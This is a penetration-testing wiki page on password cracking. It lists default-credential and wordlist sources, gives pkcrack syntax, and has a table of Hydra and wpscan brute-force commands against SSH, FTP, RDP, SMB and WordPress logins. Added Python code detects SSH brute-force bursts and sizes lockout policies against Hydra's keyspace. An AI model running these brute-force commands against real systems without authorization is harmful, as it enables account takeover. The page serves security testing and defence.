# Password Cracking

{% hint style="success" %}
Hack Responsibly.

Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
{% endhint %}

## Sections

This page was getting to be long, so here are shortcuts to the major sections. I broke these out into separate pages for better organization and searchability.

* [Getting the hashes](/hackers-rest/os-agnostic/password-cracking/gathering-the-hashes.md)
* [Wordlist manipulation](/hackers-rest/os-agnostic/password-cracking/wordlist-manipulation.md)
* [Cracking the Hashes](/hackers-rest/os-agnostic/password-cracking/cracking-the-hashes.md)

Not all methods of discovering passwords involve directly "cracking" hashes. Brute forcing logins and direct recovery programs are also viable solutions.

## Default Credentials

Search using your favorite web search engine for default credentials of the technology that is being used, or try the following compilation lists:

* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm**](http://www.vulnerabilityassessment.co.uk/passwordsC.htm)
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/**](https://192-168-1-1ip.mobi/default-router-passwords-list/)
* [**https://datarecovery.com/rd/default-passwords/**](https://datarecovery.com/rd/default-passwords/)
* [**https://bizuns.com/default-passwords-list**](https://bizuns.com/default-passwords-list)
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv**](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)

## Wordlists

* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
* [**https://github.com/kaonashi-passwords/Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi)
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md)
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)

## Password Recovery

Password recovery programs: <https://www.passcape.com/products> (TODO: Test these!)

### ZIP Password Retrieval (with Known Plaintext)

*Download pkcrack*

<https://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack/download1.html>

Note: pkcrack is distributed as source and must be built before use.

*Syntax*

```bash
# -C / -P take the encrypted and the plaintext ZIP archives; -c / -p take the
# name of the entry inside each archive (usually the same name in both). The
# plaintext copy must be compressed the same way as the encrypted one so the
# compressed bytes line up.
# Variables are quoted and named without a trailing ".zip": an unquoted
# "$encrypted.zip" would expand "$encrypted" and then append a literal ".zip".
./pkcrack -C "$encrypted_zip" -c "$entry_name" -P "$plaintext_zip" -p "$entry_name"
```

## Brute forcing logins <a href="#hydra" id="hydra"></a>

An amazing index of brute-force commands: <https://book.hacktricks.xyz/brute-force>

### Hydra

Below are a few scriptable examples to brute force logins of common protocols.

| Command                                                                                                                              | Description                                                |
| ------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------- |
| `hydra -P $pass_list -v $ip snmp -vV`                                                                                                | SNMP: Brute force                                          |
| `hydra -t 1 -l $user -P $pass_list -vV $ip ftp`                                                                                      | FTP: with known user, using password list                  |
| `hydra -vV -u -L $users_list -P $pass_list -t 1 $ip ssh`                                                                             | SSH: using users list and passwords list (`-u` loops over users before moving to the next password) |
| `hydra -vV -u -L $users_list -p $pass -t 1 $ip ssh`                                                                                  | SSH: with a known password, and a username list            |
| `hydra -vV $ip -s $port ssh -l $user -P $pass_list`                                                                                  | SSH: with known username on non-standard port              |
| `hydra -vV -l $user -P $pass_list -f $ip pop3`                                                                                       | POP3: Brute Force                                          |
| `hydra -vV -L $users_list -P $pass_list $ip http-get $login_page`                                                                    | HTTP GET: with user list and pass list                     |
| `hydra -vV -t 1 -f -l $user -P $pass_list rdp://$ip`                                                                                 | Windows Remote Desktop: with known username, and pass list |
| `hydra -vV -t 1 -f -l $user -P $pass_list $ip smb`                                                                                   | SMB: brute force with known user, and pass list            |
| `hydra -vV -l $user -P $pass_list $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location'` | WordPress: brute force an admin login (success condition `S=` is a `Location` redirect header) |
| `hydra -vV -L $users_list -p $pass $ip http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'`     | WordPress: enumerate users                                 |
| `wpscan --url $url -U $user -P $pass_list`                                                                                           | Use wpscan to brute force password with known user         |
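Every command in the table above leaves a dense burst of failed logins from one source in the target's authentication log, which is what a defender keys on. The following is an added example (not code from this page or from the Hydra project) that parses constructed OpenSSH `sshd` log lines and flags any source IP that accumulates a threshold of failures inside a sliding window, also recording whether a successful login from that IP followed the burst. The sample lines, the year supplied to the parser (syslog lines carry none), and the threshold and window defaults are all assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in OpenSSH's syslog format; not real captures.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.9 port 51122 ssh2
Mar  3 10:15:01 bastion sshd[2102]: Failed password for invalid user test from 203.0.113.9 port 51123 ssh2
Mar  3 10:15:02 bastion sshd[2103]: Failed password for root from 203.0.113.9 port 51124 ssh2
Mar  3 10:15:02 bastion sshd[2104]: Failed password for root from 203.0.113.9 port 51125 ssh2
Mar  3 10:15:03 bastion sshd[2105]: Failed password for oracle from 203.0.113.9 port 51126 ssh2
Mar  3 10:15:03 bastion sshd[2106]: Failed password for invalid user guest from 203.0.113.9 port 51127 ssh2
Mar  3 10:15:04 bastion sshd[2107]: Accepted password for deploy from 203.0.113.9 port 51128 ssh2
Mar  3 10:20:00 bastion sshd[2200]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Mar  3 10:31:00 bastion sshd[2201]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar  3 10:31:05 bastion sshd[2202]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

# Matches both "Failed password for [invalid user] X from IP" and "Accepted <method> for X from IP".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_events(text, year=2024):
    """Parse sshd auth lines into (timestamp, result, user, ip) tuples.
    syslog timestamps have no year, so one is supplied (assumed here)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs with at least `threshold` failed logins inside any
    `window`-long sliding window. Returns, for flagged IPs only:
    {ip: {"burst_start", "failures" (total for that IP), "users" (distinct
    names tried), "success_after_burst" (an Accepted line at/after burst_start)}}."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, result, user, ip in sorted(events):
        (failures if result == "Failed" else successes)[ip].append((ts, user))

    findings = {}
    for ip, fails in failures.items():
        start = 0
        for end in range(len(fails)):
            # advance the window's left edge until it spans at most `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 >= threshold and ip not in findings:
                findings[ip] = {"burst_start": fails[start][0]}
        if ip in findings:
            burst_start = findings[ip]["burst_start"]
            findings[ip].update({
                "failures": len(fails),
                "users": sorted({u for _, u in fails}),
                "success_after_burst": any(ts >= burst_start for ts, _ in successes.get(ip, [])),
            })
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

A success from the same source right after a burst is the alert that matters most: it is the signature of a guessed credential rather than a noisy scanner, and is the trigger for resetting that account and reviewing what the session did. Tune `threshold` and `window` against your own baseline; Hydra's default of 16 parallel tasks produces far more than five failures per minute, so a low threshold catches it without flagging a user mistyping a password twice.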

#### Other useful Hydra options

**`-x min:max:charset` -** Generate passwords from `min` to `max` characters long. The charset can contain `1` for digits, `a` for lowercase letters and `A` for uppercase letters; any other character in the charset is added to the alphabet literally.\
Example: `1:2:a1%.` generates passwords of length 1 to 2 made up of lowercase letters, digits, percent signs and/or periods.

**`-e nsr` -** Do additional checks: `n` tries a null (empty) password, `s` tries the login name as the password, and `r` tries the reversed login name as the password.
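To make the two options above concrete, and to show what a lockout or rate-limit policy is up against, here is an added example (not code from this page or from Hydra) that parses a `-x min:max:charset` spec into its alphabet, computes the resulting keyspace size and the time a full sweep takes at a given attempt rate, and lists the extra candidates `-e nsr` adds for a login name. The charset letter meanings are the ones documented on this page; the candidate order the generator uses (shortest length first, alphabet order within a length) is this example's own choice and is not a claim about Hydra's internal order.

```python
import itertools
import string

# Charset letters as documented for hydra -x: '1' = digits, 'a' = lowercase,
# 'A' = uppercase; anything else is taken literally.
CHARSET_GROUPS = {
    "1": string.digits,
    "a": string.ascii_lowercase,
    "A": string.ascii_uppercase,
}


def parse_x_spec(spec):
    """Turn '1:2:a1%.' into (min_len, max_len, alphabet), dropping repeated characters."""
    min_len, max_len, charset = spec.split(":", 2)
    alphabet = []
    for ch in charset:
        for c in CHARSET_GROUPS.get(ch, ch):
            if c not in alphabet:  # keep first-seen order, ignore repeats such as 'aa'
                alphabet.append(c)
    lo, hi = int(min_len), int(max_len)
    if lo < 1 or hi < lo or not alphabet:
        raise ValueError(f"bad -x spec: {spec!r}")
    return lo, hi, "".join(alphabet)


def keyspace_size(spec):
    """Number of candidates a -x spec covers: sum of n^L over each length L."""
    lo, hi, alphabet = parse_x_spec(spec)
    n = len(alphabet)
    return sum(n ** length for length in range(lo, hi + 1))


def generate_candidates(spec, limit=None):
    """Yield candidates, shortest length first (this example's order, not
    necessarily Hydra's). `limit` caps the count so big specs can be sampled."""
    lo, hi, alphabet = parse_x_spec(spec)
    produced = 0
    for length in range(lo, hi + 1):
        for combo in itertools.product(alphabet, repeat=length):
            if limit is not None and produced >= limit:
                return
            yield "".join(combo)
            produced += 1


def extra_checks(login, flags="nsr"):
    """Candidates added by -e: n = empty password, s = login as password,
    r = reversed login as password. Returned in flag order without duplicates."""
    out = []
    for f in flags:
        cand = {"n": "", "s": login, "r": login[::-1]}[f]
        if cand not in out:
            out.append(cand)
    return out


def seconds_to_exhaust(spec, attempts_per_second):
    """Wall-clock seconds for a full -x sweep at the given rate; compare this
    with your lockout threshold and window when sizing a policy."""
    return keyspace_size(spec) / attempts_per_second


if __name__ == "__main__":
    spec = "1:2:a1%."
    print(spec, "->", keyspace_size(spec), "candidates")
    print("first ten:", list(generate_candidates(spec, limit=10)))
    print("-e nsr for 'admin':", extra_checks("admin"))
    print(f"sweep at 16 attempts/s: {seconds_to_exhaust(spec, 16):.0f} s")
```

The `1:2:a1%.` spec from the page yields a 38-character alphabet and 38 + 38² = 1482 candidates, which a single Hydra run exhausts in under two minutes; a lockout that trips after a handful of failures, or throttling that pushes the rate to a few attempts per minute, is what turns that into hours or days. The `-e nsr` candidates are worth the same attention in reverse: empty, login-as-password and reversed-login passwords should be rejected by the password policy outright.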

### crackmapexec (Deprecated, now netexec!)

{% embed url="https://github.com/byt3bl33d3r/CrackMapExec" %}

<https://mpgn.gitbook.io/crackmapexec/>

TODO: crackmapexec is now netexec! Update this!

* <https://www.netexec.wiki/>
* <https://github.com/Pennyw0rth/NetExec>

TODO: This tool has so many features and functions it deserves its own page!

## Resources

* <https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers>
* <https://github.com/frizb/>
* <https://guide.offsecnewbie.com/password-cracking>
* <https://www.hackingarticles.in/abusing-kerberos-using-impacket/>

If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)!
